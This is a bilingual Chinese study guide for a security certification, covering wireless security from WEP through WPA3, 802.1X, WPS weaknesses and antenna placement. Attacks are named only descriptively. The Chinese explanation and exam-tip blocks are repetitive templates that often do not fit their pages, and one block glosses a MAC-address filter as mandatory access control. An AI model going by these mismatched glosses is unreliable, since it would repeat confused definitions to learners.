网络,2.4 GHz 通常更受青睐,因为它能在较远距离内提供良好的覆盖,但速 度较慢; 5 GHz 通常更适用于内部网络,因为它提供更高的吞吐量(但覆盖范 围较小),但它无法穿透墙壁和家具等固体障碍物。 大多数网状 Wi‑Fi(多个 WAP)方案基于 5 GHz,并使用三个或更多微型 WAP 设备,在家庭或办公室 内提供 ML 优化(具备机器学习能力)的覆盖。 6 GHz 频谱范围比 5 GHz 频 谱支持多达七个 160 MHz 宽的信道。 这是由于 6 GHz 频谱是一个连续的 1.2 GHz 频率范围,而 5 GHz 频谱则是多个非连续范围。 这使得它能提供比早期 Wi‑Fi 形式更高的最高速度连接。 支持 1–6 GHz 频谱范围的设备被标记为 Wi‑Fi 6E(不带 E 的版本仅支持 1–5 GHz)。 然而,6 GHz 更受障碍物和距 离的限制。 进行现场勘测 无线小区是指在物理环境中无线设备能够连接到无线接入点的区域。 您应 调整无线接入点(WAP)的信号强度,以最大化授权用户的访问,并最小化 外部入侵者的访问。 这可能需要对无线接入点进行特殊部署、屏蔽以及噪声抑 制。

通常,WAP的部署位置是通过执行现场勘测来生成热力图确定的。 现场 勘测对于评估现有无线网络部署、规划当前部署的扩展以及规划未来部署都非 常有用。 现场勘测是使用射频信号检测器对无线信号强度、质量和干扰进行的正式评估。 现场勘测通过将无线基站放置在期望的位置,然后从整个区域收集信号测量数 据来执行。 这些测量数据将被评估,以确定所需区域是否具有足够的信号,同 时最小化其他区域的信号强度。 如果调整了基站,则应重复进行现场勘测。 现 场勘测的目标是在所需区域(如家庭或办公室内)最大化性能,同时最小化外 部区域未经授权访问的便利性。 现场勘查通常用于生成热力图。 热力图是对建筑物平面图上信号强度测量值的 映射。 热力图有助于定位热点(信号过载)和盲点(信号缺失),以指导对无 线接入点(WAP)位置、天线类型、天线方向和信号强度的调整。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 770 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 53 / PDF P771

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Wireless Security Wi-Fi is not always encrypted, and even when it is, the encryption is only between the client device and the base station. For end-to-end encryption of communications, use a VPN or an encrypted communications application to pre-encrypt communications before transmitting them over Wi-Fi. For foundational encryption concepts, see Chapter 6, “Cryptography and Symmetric Key Algorithms,” and Chapter 7, “PKI and Cryptographic Applications.” The original IEEE 802.11 standard defined two methods that wireless clients can use to authenticate to WAPs before normal network communications can occur across the wireless link.

These two methods are open system authentication (OSA) and shared key authentication (SKA). OSA means no real authentication is required. As long as a radio signal can be transmitted between the client and WAP, communications are allowed. It is also the case that wireless networks using OSA typically transmit everything in cleartext, thus providing no secrecy or security. With SKA, some form of authentication must take place before network communications can occur. The 802.11 standard defines one optional technique for SKA known as Wired Equivalent Privacy (WEP). Later 802.11 amendments added WPA, WPA2, WPA3, and other technologies.

Wired Equivalent Privacy (WEP) Wired Equivalent Privacy (WEP) is defined by the original IEEE 802.11 standard. WEP uses a predefined shared Rivest Cipher 4 (RC4) secret key for both authentication (i.e., SKA) and encryption. Unfortunately, the shared key is static and shared among the WAP(s) and clients. Due to flaws in its implementation of RC4, WEP is weak. WEP was cracked almost as soon as it was released. Today, it is possible to crack WEP in less than a minute. Fortunately, there are alternatives to WEP that you should use instead.

Wi-Fi Protected Access (WPA) Wi-Fi Protected Access (WPA) was designed as the replacement for WEP; it was a temporary fix until the new 802.11i amendment was completed. WPA is a significant improvement over WEP in that it does not use the same static key to encrypt all communications. Instead, it negotiates a unique key set

中文直译 / 整理

无线安全 Wi‑Fi 并不总是加密的,即使加密了,加密也仅限于客户端设备与基站之间。 要实现通信的端到端加密,请使用 VPN 或加密通信应用程序,在通过 Wi‑Fi 传输前预先加密通信内容。 有关基础加密概念,请参见第 6 章,“加 密学与对称密钥算法”,和第 7 章,“PKI 与加密应用。 ” 原始的IEEE 802.11标准定义了两种无线客户端在无线链路上建立正常网络通 信前可用于向WAP进行身份验证的方法。 这两种方法是开放系统认证(OSA) 和共享密钥认证(SKA)。 OSA意味着无需进行实际的身份验证。 只要客户端与WAP之间能够传输无线电 信号,通信即被允许。 此外,使用OSA的无线网络通常以明文传输所有数据, 因此不提供任何机密性或安全性。 使用SKA时,必须在发生网络通信前完成某种形式的身份验证。 IEEE 802.11标准定义了一种名为有线等效保密(WEP)的可选SKA技术。 后续的 802.11修订版增加了WPA、WPA2、WPA3及其他技术。 有线等效保密(WEP) 有线等效保密(WEP)由原始的IEEE 802.11标准定义。

WEP使用预定义 的共享RC4(Rivest Cipher 4)密钥进行身份验证(即SKA)和加密。 然而, 该共享密钥是静态的,并在WAP和客户端之间共享。 由于其RC4实现存在缺陷, WEP安全性较弱。 WEP 几乎在发布后不久就被破解了。 如今,可以在不到一分钟内破解 WEP。 幸运的是,有 WEP 的替代方案,您应该使用它们。 Wi‑Fi 受保护访问(WPA) Wi-Fi Protected Access (WPA) 是作为 WEP 的替代品设计的; 它是一个临时解决 方案,直到新的 802.11i 修正案完成为止。 WPA 相比 WEP 有显著改进,因为它不使用 相同的静态密钥来加密所有通信。 相反,它会与每个主机协商一组唯一的密钥

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
学习单元 54 / PDF P772

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

with each host. Additionally, it separated authentication from encryption. WPA borrowed the authentication options from the then-still-draft of 802.11i. WPA uses the RC4 algorithm and employs the Temporal Key Integrity Protocol (TKIP) or the Cisco alternative, Lightweight Extensible Authentication Protocol (LEAP). However, WPA is no longer secure. Attacks specific to WPA (i.e., coWPAtty and GPU-based cracking tools) have rendered WPA's security unreliable. WPA might still be deployed to support EOSL or legacy equipment (although this is a very poor security option).

Temporal Key Integrity Protocol (TKIP) was designed as a temporary measure to support WPA features without requiring the replacement of legacy wireless hardware. TKIP and WPA were officially replaced by WPA2 in 2004. In 2012, TKIP was officially deprecated and is no longer considered secure. Wi-Fi Protected Access 2 (WPA2) IEEE 802.11i or Wi-Fi Protected Access 2 (WPA2) replaced WEP and WPA. It implements AES-CCMP instead of RC4. To date, no attacks have been successful against AES-CCMP encryption. However, there have been exploitations of the WPA2 key exchange processes (research KRACK [Key Reinstallation AttaCKs], if interested).

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) (Counter-Mode/CBC-MAC Protocol) is the combination of two block cipher modes to enable streaming by a block algorithm. CCMP can be used on many block ciphers. The AES-CCMP implementation was defined as part of WPA2, which replaced WEP and WPA, and is also used in WPA3 as the preferred means of wireless encryption. WPA2/802.11i defined two “new” authentication options known as preshared key (PSK) or personal (PER) and IEEE 802.1X or enterprise (ENT). They were also supported in WPA, but they were borrowed from the draft of IEEE 802.11i before it was finalized. PSK is the use of a static fixed password for 。

中文直译 / 整理

此外,它将身份验证与加密分离。 WPA 借鉴了当时仍处于草案阶段的 802.11i 的 身份验证选项。 WPA 使用 RC4 算法,并采用 临时密钥完整性协议(TKIP) 或 Cisco 的替 代方案 轻量级可扩展认证协议(LEAP)。 然而,WPA 已不再安全。 针对 WPA 的攻击(例如 coWPAtty 和基于 GPU 的破解工具)已使 WPA 的安全性 不可靠。 WPA 可能仍被用于支持 EOSL 或旧设备(尽管这是一种非常不安全 的选项)。 临时密钥完整性协议(TKIP) 被设计为一种临时措施,用于在无需更换 旧无线硬件的情况下支持 WPA 功能。 TKIP 和 WPA 已于 2004 年被 WPA2 正式取代。 2012 年,TKIP 被正式弃用,不再被视为安全。 Wi‑Fi 保护访问 2 (WPA2) IEEE 802.11i 或 Wi-Fi保护访问2(WPA2) 取代了 WEP 和 WPA。 它采用 AES‑CCMP 而非 RC4。 迄今为止,尚未有针对 AES‑CCMP 加密的成功攻击。 然而,已出现对 WPA2 密钥交换过程的利用(有关详细信息,请参阅研究 KRACK [密钥重装攻击], )。

计数器模式与密码块链消息认证码协议(CCMP)(计数器模式/ CBC-MAC协议) 是两种分组密码模式的组合,用于通过分组算法实现流式 加密。 CCMP 可用于多种分组密码。 AES‑CCMP 实现作为 WPA2 的一部 分被定义,WPA2 取代了 WEP 和 WPA,并且在 WPA3 中也被用作无线 加密的首选方式。 WPA2/802.11i 定义了两种“新”的认证选项,称为 预共享密钥(PSK) 或 个人模式(PER), 以及 IEEE 802.1X 或 企业模式(ENT)。 它们在 WPA 中也得到了支持,但这些选项是在 IEEE 802.11i 最终定稿前从其草案中借鉴而来的。 PSK 是使用静态固定密码进行

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 55 / PDF P773

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

authentication. ENT enables the leveraging of an existing AAA service, such as RADIUS or TACACS+, to be used for authentication. Don't forget about the ports related to common AAA services: UDP 1812 (authentication and authorization) and UDP 1813 (accounting) for RADIUS and TCP 49 for TACACS+. Wi-Fi Protected Access 3 (WPA3) Wi-Fi Protected Access 3 (WPA3) was finalized in January 2018. WPA3-ENT uses 192-bit AES CCMP encryption, and WPA3-PER remains at 128-bit AES CCMP. WPA3-PER replaces the preshared key authentication with Simultaneous Authentication of Equals (SAE). Some 802.11ac/Wi-Fi 5 devices were the first to support or adopt WPA3.

Simultaneous Authentication of Equals (SAE) still uses a password, but it no longer encrypts and sends that password across the connection to perform authentication. Instead, SAE performs a zero-knowledge proof process known as Dragonfly Key Exchange, which is itself a derivative of Diffie–Hellman. The process uses the preset password and the MAC addresses of the client and AP to perform authentication and session key exchange.

(There have been attacks against SAE; research Dragonblood attack, if interested.) WPA3 also implements IEEE 802.11w-2009 management frame protection so that a majority of network management operations have confidentiality, integrity, authentication of source, and replay protection. 802.1X/EAP WPA, WPA2, and WPA3 support the enterprise (ENT) authentication known as 802.1X/EAP, a standard port-based network access control that ensures that clients cannot communicate with a resource until proper authentication has taken place. Effectively, 802.1X is a handoff system that allows network devices to leverage the existing network infrastructure's authentication services.

You can almost consider 802.1X as an authentication proxy service. Through the use of 802.1X, other techniques and solutions such as Remote Authentication Dial-In User Service (RADIUS), Terminal Access Controller Access Control System (TACACS), certificates, smartcards, token devices, and

中文直译 / 整理

认证。 ENT 能够利用现有的 AAA 服务,例如 RADIUS 或 TACACS+,用于认证。 不要忘记与常见AAA服务相关的端口:RADIUS使用UDP 1812(认证 和授权)和UDP 1813(计费),TACACS+使用TCP 49。 Wi‑Fi 受保护访问 3(WPA3) Wi-Fi Protected Access 3 (WPA3)于2018年1月最终确定。 WPA3‑ENT使 用192位AES CCMP加密,而WPA3‑PER仍使用128位AES CCMP。 WPA3‑PER用平等同时认证(SAE)取代了预共享密钥认证。 一些 802.11ac/Wi‑Fi 5设备是首批支持或采用WPA3的设备。 平等同时认证(SAE)仍然使用密码,但不再加密并沿连接发送该密码以执行 认证。 相反,SAE执行一种称为Dragonfly密钥交换的零知识证明过程,该过 程本身是Diffie–Hellman的衍生。 该过程使用预设密码以及客户端和AP的 MAC地址来执行认证和会话密钥交换。 (已出现针对SAE的攻击; 如有兴趣, 可研究Dragonblood攻击。

) WPA3 还实现了 IEEE 802.11w‑2009 管理帧保护,从而使得大多数网络管理操 作具备机密性、完整性、源身份验证和重放保护。 802.1X/EAP WPA、WPA2 和 WPA3 支持称为 802.1X/EAP 的企业(ENT)身份验证,这 是一种基于端口的网络访问控制标准,可确保客户端在通过适当的身份验证之 前无法与资源通信。 实际上,802.1X 是一种交接系统,允许网络设备利用现有 网络基础设施的身份验证服务。 您可以几乎将 802.1X 视为一种身份验证代理 服务。 通过使用 802.1X,其他技术与解决方案,例如远程用户拨号认证服务 (RADIUS)、终端访问控制器访问控制系统(TACACS)、证书、智能卡、 令牌设备和

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 56 / PDF P774

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

biometrics can be integrated into wireless networks, providing techniques for both mutual and multifactor authentication. Extensible Authentication Protocol (EAP) is not a specific mechanism of authentication; rather it is an authentication framework. Effectively, EAP allows for new authentication technologies to be compatible with existing wireless or point-to-point connection technologies. For more on EAP and 802.1X, see Chapter 12. LEAP Lightweight Extensible Authentication Protocol (LEAP) is a Cisco proprietary alternative to TKIP for WPA. This was developed to address deficiencies in TKIP before the 802.11i/WPA2 system was ratified as a standard.

An attack tool known as asleap was released in 2004 that could exploit the ultimately weak protection provided by LEAP. LEAP should be avoided when possible; use of EAP-TLS as an alternative is recommended, but if LEAP is used, a complex password is strongly recommended. PEAP Protected Extensible Authentication Protocol (PEAP) encapsulates EAP methods within a TLS tunnel that provides authentication and potentially encryption. Since EAP was originally designed for use over physically isolated channels and hence assumed secured pathways, EAP is usually not encrypted. So PEAP can provide encryption for EAP methods.

Wi-Fi Protected Setup (WPS) Wi-Fi Protected Setup (WPS) is a security standard for wireless networks. It is intended to simplify the effort involved in adding new clients to a wellsecured wireless network. It operates by auto-connecting and automatically authenticating the first new wireless client to initiate a connection to the network once WPS is triggered. WPS can be initiated by a button on the WAP or a code or PIN that can be sent to the base station remotely.

This allows for a brute-force guessing attack that could enable a threat actor to guess the WPS code in less than six hours, which in turn would enable the threat actor to connect their own unauthorized system to the wireless network.

中文直译 / 整理

生物识别技术可以集成到无线网络中,提供用于双向和多因素身份验证的技术。 可扩展认证协议(EAP)不是一种特定的认证机制,而是一种认证框架。 实际上,EAP 允许新的认证技术与现有的无线或点对点连接技术兼容。 有 关 EAP 和 802.1X 的更多信息,请参阅第 12 章。 LEAP 轻量级可扩展认证协议(LEAP)是 WPA 中用于替代 TKIP 的思科专有方案。 该协议旨在解决 802.11i/WPA2 系统被确立为标准之前 TKIP 存在的缺陷。 2004 年发布了一种名为 asleap 的攻击工具,能够利用 LEAP 提供的最终薄弱 保护。 在可能的情况下应避免使用 LEAP; 建议使用 EAP‑TLS 作为替代方案, 但如果必须使用 LEAP,则强烈建议使用复杂密码。 PEAP 受保护的可扩展认证协议(PEAP)将 EAP 方法封装在 TLS 隧道中,以提供认 证和可能的加密功能。 由于 EAP 最初是为在物理隔离的信道上使用而设计的, 因此假定路径是安全的,EAP 通常不加密。 因此,PEAP 可以为 EAP 方法提供 加密功能。

Wi‑Fi 保护设置 (WPS) Wi-Fi Protected Setup (WPS) 是一种无线网络的安全标准,旨在简化将新 客户端添加到已良好保护的无线网络所需的操作。 其工作原理是在 WPS 被触 发后,自动连接并自动认证第一个发起网络连接的新无线客户端。 WPS 可通 过 WAP 上的按钮或发送到基站的代码或 PIN 码来启动。 这允许进行暴力猜测 攻击,攻击者可在不到六小时内猜出 WPS 码,从而能够将自己未经授权的系 统连接到无线网络。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 57 / PDF P775

第 775 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The PIN code is composed of two four-digit segments, which can be guessed one segment at a time, with confirmation from the base station of each segment. WPS is a feature that is enabled by default on most WAPs because it is a requirement for device Wi-Fi Alliance certification. It's important to disable it as part of a security-focused predeployment process. If a device doesn't offer the ability to turn off WPS (or the configuration Off switch doesn't work), upgrade or replace the base station's firmware or replace the whole device. Wireless MAC Filter A MAC filter can be used on a WAP to limit or restrict access to only known and approved devices.

The MAC filter is a list of authorized wireless client interface MAC addresses that is used by a WAP to block access to all nonauthorized devices. Though a potentially useful feature, it can be difficult to manage and tends to be used only in small, static environments. However, even with WPA2 or WPA3, the Ethernet header remains in cleartext, which enables threat actors to sniff and spoof authorized MAC addresses. Additionally, many modern mobile devices offer randomized Wi-Fi MAC addresses. Thus, MAC filtering is no longer a useful option to block unknown devices while allowing in known ones.

Wireless Antenna Management A wide variety of antenna types can be used for wireless clients and base stations. Many devices can have their standard antennas replaced with stronger (i.e., signal-boosting) antennas. The standard straight or pole antenna is an omnidirectional antenna. This is the antenna found on most base stations and client devices. This type of antenna is sometimes also called a base antenna or a rubber duck antenna (due to most being covered in a flexible rubber coating). Most other types of antennas are directional, meaning they focus their sending and receiving capabilities in one primary direction.

Some examples of directional antennas include Yagi, cantenna, panel, and parabolic. A Yagi antenna is similar in structure to that of traditional roof TV antennas, which are crafted from a straight bar with cross-sections. Cantennas are constructed PIN

中文直译 / 整理

码由两个四位数段组成,可以逐段猜测,每猜中一段都会得到基站 的确认。 WPS 是一项默认在大多数 WAP 上启用的功能,因为它是设备 Wi‑Fi 联盟认证 的要求。 在安全导向的部署前过程中,禁用它非常重要。 如果设备无法关闭 WPS(或配置的关闭开关无效),请升级或更换基站的固件,或更换整个设备。 无线 MAC 过滤 可以在 WAP 上使用 MAC过滤 来限制或仅允许已知且经过批准的设备访问。 MAC 过滤是一组授权无线客户端接口 MAC 地址的列表,WAP 使用该列表阻 止所有未授权设备的访问。 尽管这是一项潜在有用的功能,但管理起来可能很 困难,通常仅用于小型、静态环境。 然而,即使在使用 WPA2 或 WPA3 的情 况下,以太网报头仍以明文形式存在,这使得攻击者能够嗅探并伪造授权的 MAC 地址。 此外,许多现代移动设备提供随机化的 Wi‑Fi MAC 地址。 因此, MAC 过滤已不再是一种有效的选项,无法在允许已知设备的同时阻止未知设 备。 无线天线管理 无线客户端和基站可使用多种类型的天线。 许多设备可以将标准天线更换 为更强的(即信号增强型)天线。 标准的直杆或杆状天线是一种全向天线。

这是大多数基站和客户端设备上常见 的天线。 这种类型的天线有时也称为基座天线或橡胶鸭天线(因为大多数天线 都覆盖有柔性橡胶涂层)。 大多数其他类型的天线都是定向的,意味着它们的发送和接收能力集中在单一 主要方向上。 一些定向天线的例子包括Yagi、cantenna、面板和抛物面天线。 Yagi天线的结构与传统的屋顶电视天线相似,后者由一根带有横截面的直杆制 成。 Cantennas由

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 775 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 58 / PDF P776

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

from tubes with one sealed end. Panel antennas are flat devices that focus from only one side of the panel. Parabolic antennas are used to focus signals from very long distances or weak sources. Consider the following guidelines when seeking optimal antenna placement: Use a central location. Avoid solid physical obstructions. Avoid reflective or other flat metal surfaces. Avoid electrical equipment. If a base station has external omnidirectional antennas, typically, they should be positioned pointing straight up vertically. If a directional antenna is used, point the focus toward the area of desired use.

Keep in mind that wireless signals are affected by interference, distance, and obstructions. Some WAPs provide a physical or logical adjustment of the antenna power levels. Power level controls are typically set by the manufacturer to a setting that is suitable for most situations. After performing site surveys, if wireless signals are still not satisfactory, power level adjustment might be necessary. However, changing channels, avoiding reflective and signal-scattering surfaces, and reducing interference can often be more significant in terms of improving connectivity reliability. When adjusting power levels, make minor adjustments instead of attempting to maximize or minimize the setting.

Also, take note of the initial/default setting so that you can return to that setting if desired. After each power level adjustment, reset/reboot the WAP before re-performing site survey and quality tests. Sometimes, lowering the power level can improve performance. Some WAPs are capable of providing higher power levels than are allowed by regulations in countries where they are available. Using Captive Portals A captive portal is an authentication technique that redirects a newly connected client to a web-based portal access control page. The portal page may require the user to input payment information, provide login credentials, or input an access code.

A captive portal is also used to display an acceptable use policy, privacy policy, and tracking policy to the user, who must consent to the policies before being able to communicate across the network.

中文直译 / 整理

